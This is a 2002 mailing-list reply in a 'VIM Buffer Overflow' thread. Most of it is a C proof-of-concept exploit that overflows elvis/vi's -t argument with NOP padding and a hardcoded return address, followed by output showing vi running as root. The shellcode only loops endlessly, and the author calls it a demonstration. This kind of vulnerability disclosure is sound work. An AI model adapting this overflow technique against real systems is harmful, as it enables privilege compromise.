Vulnerability Development mailing list archives
Re: VIM Buffer Overflow
From: Felipe Cerqueira <fcerqueira () bufferoverflow org>
Date: Sun, 17 Feb 2002 11:31:24 -0300 (BRT)
/* elvis 2.1_4 (slackware 8.0) Expl by skylazart * * It's only for demonstration purpose! */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> int main (int argc, char **argv) { char buffer[120 + 1]; long ret_addr = 0xbffffcfc; char sc[] = "\xeb\xfe"; /* loop for me please! ;) */ int i; char *argv1[] = {"/usr/bin/vi", "-t", buffer, NULL}; if ( argc > 1 ) ret_addr += atoi ( argv[1] ); for ( i = 0; i < sizeof (buffer); i += 4 ) *(long *)&buffer[i] = ret_addr; memset (buffer, 0x90, 22); buffer[22] = sc[0]; buffer[23] = sc[1]; buffer[120] = '\0'; printf ("returning to 0x%08lx\n", ret_addr); printf ("endless loop.. ps auxw and kill it \\xeb\\xfe jump *ebp;)\n"); execve ("/usr/bin/vi", argv1, NULL); return (0); } it only stops consisting... root 3740 99.9 0.3 1668 780 tty2 R 11:30 0:14 /usr/bin/vi -t ?? -- Felipe Cerqueira Buffer Overflow Inf. Ltda.
Current thread:
- VIM Buffer Overflow Aramis Orlando (Feb 15)
- Re: VIM Buffer Overflow KF (Feb 16)
- Re: VIM Buffer Overflow Felipe Cerqueira (Feb 17)
- Re: VIM Buffer Overflow KF (Feb 16)